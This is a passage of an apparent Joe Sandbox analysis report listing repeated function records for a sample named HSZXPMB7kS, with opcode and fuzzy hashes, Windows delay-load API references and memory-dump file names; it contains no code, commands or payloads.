        • Opcode Fuzzy Hash: cd8e1a786d52d263aae49111127554d1a1a92da7e6cfb749ed560927c4afbcd3
        • Instruction Fuzzy Hash: A6B01285669101BCF38871147D06F36021CC5D0B15770813FF411C4180D7400D4AA731
        APIs
        • ___delayLoadHelper2@8.DELAYIMP ref: 0013F32D
          • Part of subcall function 0013F9D9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0013FA4C
          • Part of subcall function 0013F9D9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0013FA5D
        Memory Dump Source
        • Source File: 00000001.00000002.1564744220.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
        • Associated: 00000001.00000002.1564726375.0000000000120000.00000002.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564774065.0000000000154000.00000002.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564792040.0000000000160000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564792040.0000000000163000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564792040.0000000000165000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564792040.0000000000184000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564851233.0000000000185000.00000002.00000001.01000000.00000003.sdmp
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_1_2_120000_HSZXPMB7kS.jbxd
        Similarity
        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
        • String ID:
        • API String ID: 1269201914-0
        • Opcode ID: 95ea24b3318fce787914d0cef8b90f6d640c11e73fd7f90d6c00589178f5fd4c
        • Instruction ID: 4eddefe630d99ae7ff70cd129b5c29c0693a5bb1da99a86ede2e080666b00df0
        • Opcode Fuzzy Hash: 95ea24b3318fce787914d0cef8b90f6d640c11e73fd7f90d6c00589178f5fd4c
        • Instruction Fuzzy Hash: B5B01289669101BCF34871147D06F37025CD5D0F117B0403FF401C4080D7400D06A731
        APIs
        • ___delayLoadHelper2@8.DELAYIMP ref: 0013F32D
          • Part of subcall function 0013F9D9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0013FA4C
          • Part of subcall function 0013F9D9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0013FA5D
        Memory Dump Source
        • Source File: 00000001.00000002.1564744220.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
        • Associated: 00000001.00000002.1564726375.0000000000120000.00000002.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564774065.0000000000154000.00000002.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564792040.0000000000160000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564792040.0000000000163000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564792040.0000000000165000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564792040.0000000000184000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564851233.0000000000185000.00000002.00000001.01000000.00000003.sdmp
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_1_2_120000_HSZXPMB7kS.jbxd
        Similarity
        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
        • String ID:
        • API String ID: 1269201914-0
        • Opcode ID: e023bc7b2c24f9b973a06809f0c306fa877bcb1a9cc4e62d49967859a74fe48d
        • Instruction ID: 50504771dee96765dfa890f7592a86a19153b5321e04db7b73656e5204790380
        • Opcode Fuzzy Hash: e023bc7b2c24f9b973a06809f0c306fa877bcb1a9cc4e62d49967859a74fe48d
        • Instruction Fuzzy Hash: 2BB01285669001FCF34871547D06F36031CD5D0F157B0843FF401C4180D7400D0AA731
        APIs
        • ___delayLoadHelper2@8.DELAYIMP ref: 0013F32D
          • Part of subcall function 0013F9D9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0013FA4C
          • Part of subcall function 0013F9D9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0013FA5D
        Memory Dump Source
        • Source File: 00000001.00000002.1564744220.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
        • Associated: 00000001.00000002.1564726375.0000000000120000.00000002.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564774065.0000000000154000.00000002.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564792040.0000000000160000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564792040.0000000000163000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564792040.0000000000165000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564792040.0000000000184000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564851233.0000000000185000.00000002.00000001.01000000.00000003.sdmp
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_1_2_120000_HSZXPMB7kS.jbxd
        Similarity
        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
        • String ID:
        • API String ID: 1269201914-0
        • Opcode ID: 01ec0566e60204eeddcf581348668fe5d3b24a3d7cae116696660e7e08199338
        • Instruction ID: 75ea7886e20b04463f5dc886458b5600400833f33ff65987435002e9c595a97b
        • Opcode Fuzzy Hash: 01ec0566e60204eeddcf581348668fe5d3b24a3d7cae116696660e7e08199338
        • Instruction Fuzzy Hash: 3BB01295669001BCF34871147D06F3A061DC5D0B15770803FF801C4080D7400E06A731
        APIs
        • ___delayLoadHelper2@8.DELAYIMP ref: 0013F32D
          • Part of subcall function 0013F9D9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0013FA4C
          • Part of subcall function 0013F9D9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0013FA5D
        Memory Dump Source
        • Source File: 00000001.00000002.1564744220.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
        • Associated: 00000001.00000002.1564726375.0000000000120000.00000002.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564774065.0000000000154000.00000002.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564792040.0000000000160000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564792040.0000000000163000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564792040.0000000000165000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564792040.0000000000184000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564851233.0000000000185000.00000002.00000001.01000000.00000003.sdmp
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_1_2_120000_HSZXPMB7kS.jbxd
        Similarity
        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
        • String ID:
        • API String ID: 1269201914-0
        • Opcode ID: 065f8e77749d7040fd0be036f82b4f6fff45c5431a79c551b742da82688fea73
        • Instruction ID: d9a8004e5411b836a4b46d17147669de79694b13c75aaffa2c0a6d86ced54d40
        • Opcode Fuzzy Hash: 065f8e77749d7040fd0be036f82b4f6fff45c5431a79c551b742da82688fea73
        • Instruction Fuzzy Hash: B5B01289669001BCF34871147E06F36021CD5D0B15770803FF401C8180D7900E0FA731
        APIs
        • ___delayLoadHelper2@8.DELAYIMP ref: 0013F32D
          • Part of subcall function 0013F9D9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0013FA4C
          • Part of subcall function 0013F9D9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0013FA5D
        Memory Dump Source
        • Source File: 00000001.00000002.1564744220.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
        • Associated: 00000001.00000002.1564726375.0000000000120000.00000002.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564774065.0000000000154000.00000002.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564792040.0000000000160000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564792040.0000000000163000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564792040.0000000000165000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564792040.0000000000184000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564851233.0000000000185000.00000002.00000001.01000000.00000003.sdmp
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_1_2_120000_HSZXPMB7kS.jbxd
        Similarity
        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
        • String ID:
        • API String ID: 1269201914-0
        • Opcode ID: 137db633e848cddc73c183b09b3e3b2502019c6cb6e169230381f7a8f6b06f32
        • Instruction ID: 6776489801b3e6e268a0aa7da879a45e12ea850147cad5d66b5ce3eca4aeb982
        • Opcode Fuzzy Hash: 137db633e848cddc73c183b09b3e3b2502019c6cb6e169230381f7a8f6b06f32
        • Instruction Fuzzy Hash: 20B01295669001BCF34871157D06F36021DD5D0F117B0403FF401C8080D7400E06A731
        APIs
        • ___delayLoadHelper2@8.DELAYIMP ref: 0013F32D
          • Part of subcall function 0013F9D9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0013FA4C
          • Part of subcall function 0013F9D9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0013FA5D
        Memory Dump Source
        • Source File: 00000001.00000002.1564744220.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
        • Associated: 00000001.00000002.1564726375.0000000000120000.00000002.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564774065.0000000000154000.00000002.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564792040.0000000000160000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564792040.0000000000163000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564792040.0000000000165000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564792040.0000000000184000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564851233.0000000000185000.00000002.00000001.01000000.00000003.sdmp
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_1_2_120000_HSZXPMB7kS.jbxd
        Similarity
        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
        • String ID:
        • API String ID: 1269201914-0
        • Opcode ID: 1861b05c301796de2851b6854be9fd44fdcebb2b3c34b654658c580e7bcbbfdf
        • Instruction ID: 518bc45a2ac40a9c8cc284ab44ab2db11dd2cab0854973a836197dd96033ea3d
        • Opcode Fuzzy Hash: 1861b05c301796de2851b6854be9fd44fdcebb2b3c34b654658c580e7bcbbfdf
        • Instruction Fuzzy Hash: 2CB01299669001BCF34871147E46F36021DC5D0B11770403FF401C8080D7800F07A731
        APIs
        • ___delayLoadHelper2@8.DELAYIMP ref: 0013F32D
          • Part of subcall function 0013F9D9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0013FA4C
          • Part of subcall function 0013F9D9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0013FA5D
        Memory Dump Source
        • Source File: 00000001.00000002.1564744220.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
        • Associated: 00000001.00000002.1564726375.0000000000120000.00000002.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564774065.0000000000154000.00000002.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564792040.0000000000160000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564792040.0000000000163000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564792040.0000000000165000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564792040.0000000000184000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564851233.0000000000185000.00000002.00000001.01000000.00000003.sdmp
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_1_2_120000_HSZXPMB7kS.jbxd
        Similarity
        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
        • String ID:
        • API String ID: 1269201914-0
        • Opcode ID: 496624f6038742b6bae43681b9f09040e36bc82aeff1e30aa30cdbab5a3d9f9b
        • Instruction ID: cf766710a7c994c3355f343e58d74e7dd2c1425c837728fd67c41c51bfabac88
        • Opcode Fuzzy Hash: 496624f6038742b6bae43681b9f09040e36bc82aeff1e30aa30cdbab5a3d9f9b
        • Instruction Fuzzy Hash: 12B0128966B001BCF34871147E1AF36021DC5D0B11B70403FF401C8081D7800E07A731
        APIs
        • ___delayLoadHelper2@8.DELAYIMP ref: 0013F32D
          • Part of subcall function 0013F9D9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0013FA4C
          • Part of subcall function 0013F9D9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0013FA5D
        Memory Dump Source
        • Source File: 00000001.00000002.1564744220.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
        • Associated: 00000001.00000002.1564726375.0000000000120000.00000002.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564774065.0000000000154000.00000002.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564792040.0000000000160000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564792040.0000000000163000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564792040.0000000000165000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564792040.0000000000184000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564851233.0000000000185000.00000002.00000001.01000000.00000003.sdmp
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_1_2_120000_HSZXPMB7kS.jbxd
        Similarity
        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
        • String ID:
        • API String ID: 1269201914-0
        • Opcode ID: eb0a7cb49340fd4f97374226409598e9fa72d5db8962027e0812380f8bbe664b
        • Instruction ID: 10c934a1a441a9f55b53612496a04f8d650c426fd08279e95ebe38862dda1972
        • Opcode Fuzzy Hash: eb0a7cb49340fd4f97374226409598e9fa72d5db8962027e0812380f8bbe664b
        • Instruction Fuzzy Hash: B2B0129566B101BCF38872147D16F36021DC5D0B11B70413FF401C4081D7400D46A731
        APIs
        • ___delayLoadHelper2@8.DELAYIMP ref: 0013F32D
          • Part of subcall function 0013F9D9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0013FA4C
          • Part of subcall function 0013F9D9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0013FA5D
        Memory Dump Source
        • Source File: 00000001.00000002.1564744220.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
        • Associated: 00000001.00000002.1564726375.0000000000120000.00000002.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564774065.0000000000154000.00000002.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564792040.0000000000160000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564792040.0000000000163000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564792040.0000000000165000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564792040.0000000000184000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564851233.0000000000185000.00000002.00000001.01000000.00000003.sdmp
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_1_2_120000_HSZXPMB7kS.jbxd
        Similarity
        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
        • String ID:
        • API String ID: 1269201914-0
        • Opcode ID: d73ac78ed90aa21eaa49ea4edbeb0f8540265517ff5b4a628871eb1e7705cb10
        • Instruction ID: 3a5aece77b6f45f7a2f311c64c25d88fa0ccbe90b68587c435ae8cecbd0559df
        • Opcode Fuzzy Hash: d73ac78ed90aa21eaa49ea4edbeb0f8540265517ff5b4a628871eb1e7705cb10
        • Instruction Fuzzy Hash: 9BB012C5669201BCF388B1147D06F36035CC5D0B11770413FF401C4080D7400D46A731
        APIs
        • ___delayLoadHelper2@8.DELAYIMP ref: 0013F32D
          • Part of subcall function 0013F9D9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0013FA4C
          • Part of subcall function 0013F9D9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0013FA5D
        Memory Dump Source
        • Source File: 00000001.00000002.1564744220.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
        • Associated: 00000001.00000002.1564726375.0000000000120000.00000002.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564774065.0000000000154000.00000002.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564792040.0000000000160000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564792040.0000000000163000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564792040.0000000000165000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564792040.0000000000184000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564851233.0000000000185000.00000002.00000001.01000000.00000003.sdmp
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_1_2_120000_HSZXPMB7kS.jbxd
        Similarity
        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
        • String ID:
        • API String ID: 1269201914-0
        • Opcode ID: 5c1e376dbd4cba1030f2c1be0cff833af56cac9d9083bf4bb07c55eae765635b
        • Instruction ID: 784bcdb39ec9e484b9a3bca632b81bf30b981287771d14edb3f304b973616068
        • Opcode Fuzzy Hash: 5c1e376dbd4cba1030f2c1be0cff833af56cac9d9083bf4bb07c55eae765635b
        • Instruction Fuzzy Hash: FFB012E9669001BCF348B1147E06F36039CC5D0B11B70403FF401C8080D7800E07A731
        APIs
        • ___delayLoadHelper2@8.DELAYIMP ref: 0013F32D
          • Part of subcall function 0013F9D9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0013FA4C
          • Part of subcall function 0013F9D9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0013FA5D
        Memory Dump Source
        • Source File: 00000001.00000002.1564744220.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
        • Associated: 00000001.00000002.1564726375.0000000000120000.00000002.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564774065.0000000000154000.00000002.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564792040.0000000000160000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564792040.0000000000163000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564792040.0000000000165000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564792040.0000000000184000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564851233.0000000000185000.00000002.00000001.01000000.00000003.sdmp
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_1_2_120000_HSZXPMB7kS.jbxd
        Similarity
        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
        • String ID:
        • API String ID: 1269201914-0
        • Opcode ID: 67fb817812774734b82f24f02ac0a37c35f6de487d8d7aa7a43ca301f73d8bf6
        • Instruction ID: 1c9f31cd09bbd4bbe9281f1c98db7e534c0c8ed6a549913ae5f2db41e0ca481c
        • Opcode Fuzzy Hash: 67fb817812774734b82f24f02ac0a37c35f6de487d8d7aa7a43ca301f73d8bf6
        • Instruction Fuzzy Hash: A6B0128567A001BCF34871547D16F36025DD9D0F11BB0403FF401C4081D7400D06A731
        APIs
        • ___delayLoadHelper2@8.DELAYIMP ref: 0013F32D
          • Part of subcall function 0013F9D9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0013FA4C
          • Part of subcall function 0013F9D9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0013FA5D
        Memory Dump Source
        • Source File: 00000001.00000002.1564744220.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
        • Associated: 00000001.00000002.1564726375.0000000000120000.00000002.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564774065.0000000000154000.00000002.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564792040.0000000000160000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564792040.0000000000163000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564792040.0000000000165000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564792040.0000000000184000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564851233.0000000000185000.00000002.00000001.01000000.00000003.sdmp
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_1_2_120000_HSZXPMB7kS.jbxd
        Similarity
        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
        • String ID:
        • API String ID: 1269201914-0
        • Opcode ID: e373fe58f5315d35133e8d4b791f654bd2645771db5b8b7446bc946f57b95954
        • Instruction ID: 0c7977b91db5f3673d84661862524653fccac112162d8d80f93c32518262a013
        • Opcode Fuzzy Hash: e373fe58f5315d35133e8d4b791f654bd2645771db5b8b7446bc946f57b95954
        • Instruction Fuzzy Hash: FCB012C5669001BCF348B1247D06F3A035CC5D0B15770803FF801C4080D7400D06A731
        APIs
        • ___delayLoadHelper2@8.DELAYIMP ref: 0013F32D
          • Part of subcall function 0013F9D9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0013FA4C
          • Part of subcall function 0013F9D9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0013FA5D
        Memory Dump Source
        • Source File: 00000001.00000002.1564744220.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
        • Associated: 00000001.00000002.1564726375.0000000000120000.00000002.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564774065.0000000000154000.00000002.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564792040.0000000000160000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564792040.0000000000163000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564792040.0000000000165000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564792040.0000000000184000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564851233.0000000000185000.00000002.00000001.01000000.00000003.sdmp
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_1_2_120000_HSZXPMB7kS.jbxd
        Similarity
        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
        • String ID:
        • API String ID: 1269201914-0
        • Opcode ID: 0b73264d5c254ae486ddc51329821003821fcdeadd653fb8a43424bac23a5583
        • Instruction ID: 3af6e1cce08b40a887f84bf295577c742ac2a3b3a9c5137bc84cac57340a69ae
        • Opcode Fuzzy Hash: 0b73264d5c254ae486ddc51329821003821fcdeadd653fb8a43424bac23a5583
        • Instruction Fuzzy Hash: 95B012856B9401BCF35871147D07F3A021CC5D0B15770803FF801C4080D7400D06A731
        APIs
        • ___delayLoadHelper2@8.DELAYIMP ref: 0013F32D
          • Part of subcall function 0013F9D9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0013FA4C
          • Part of subcall function 0013F9D9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0013FA5D
        Memory Dump Source
        • Source File: 00000001.00000002.1564744220.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
        • Associated: 00000001.00000002.1564726375.0000000000120000.00000002.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564774065.0000000000154000.00000002.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564792040.0000000000160000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564792040.0000000000163000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564792040.0000000000165000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564792040.0000000000184000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564851233.0000000000185000.00000002.00000001.01000000.00000003.sdmp
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_1_2_120000_HSZXPMB7kS.jbxd
        Similarity
        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
        • String ID:
        • API String ID: 1269201914-0
        APIs
        • ___delayLoadHelper2@8.DELAYIMP ref: 0013F32D
          • Part of subcall function 0013F9D9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0013FA4C
          • Part of subcall function 0013F9D9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0013FA5D
        Memory Dump Source
        • Source File: 00000001.00000002.1564744220.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
        Similarity
        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
        • String ID:
        • API String ID: 1269201914-0
        APIs
        • ___delayLoadHelper2@8.DELAYIMP ref: 0013F546
          • Part of subcall function 0013F9D9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0013FA4C
          • Part of subcall function 0013F9D9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0013FA5D
        Memory Dump Source
        • Source File: 00000001.00000002.1564744220.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
        Similarity
        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
        • String ID:
        • API String ID: 1269201914-0
        APIs
        • ___delayLoadHelper2@8.DELAYIMP ref: 0013F546
          • Part of subcall function 0013F9D9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0013FA4C
          • Part of subcall function 0013F9D9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0013FA5D
        Memory Dump Source
        • Source File: 00000001.00000002.1564744220.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
        Similarity
        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
        • String ID:
        • API String ID: 1269201914-0
        APIs
        • ___delayLoadHelper2@8.DELAYIMP ref: 0013F546
          • Part of subcall function 0013F9D9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0013FA4C
          • Part of subcall function 0013F9D9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0013FA5D
        Memory Dump Source
        • Source File: 00000001.00000002.1564744220.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
        Similarity
        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
        • String ID:
        • API String ID: 1269201914-0
        APIs
        • ___delayLoadHelper2@8.DELAYIMP ref: 0013F69B
          • Part of subcall function 0013F9D9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0013FA4C
          • Part of subcall function 0013F9D9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0013FA5D
        Memory Dump Source
        • Source File: 00000001.00000002.1564744220.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
        Similarity
        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
        • String ID:
        • API String ID: 1269201914-0
        APIs
        • ___delayLoadHelper2@8.DELAYIMP ref: 0013F69B
          • Part of subcall function 0013F9D9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0013FA4C
          • Part of subcall function 0013F9D9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0013FA5D
        Memory Dump Source
        • Source File: 00000001.00000002.1564744220.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
        Similarity
        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
        • String ID:
        • API String ID: 1269201914-0
        APIs
        • ___delayLoadHelper2@8.DELAYIMP ref: 0013F69B
          • Part of subcall function 0013F9D9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0013FA4C
          • Part of subcall function 0013F9D9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0013FA5D
        Memory Dump Source
        • Source File: 00000001.00000002.1564744220.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
        Similarity
        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
        • String ID:
        • API String ID: 1269201914-0
        APIs
        • ___delayLoadHelper2@8.DELAYIMP ref: 0013F6FC
          • Part of subcall function 0013F9D9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0013FA4C
          • Part of subcall function 0013F9D9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0013FA5D
        Memory Dump Source
        • Source File: 00000001.00000002.1564744220.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
        Similarity
        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
        • String ID:
        • API String ID: 1269201914-0
        APIs
        • ___delayLoadHelper2@8.DELAYIMP ref: 0013F6FC
          • Part of subcall function 0013F9D9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0013FA4C
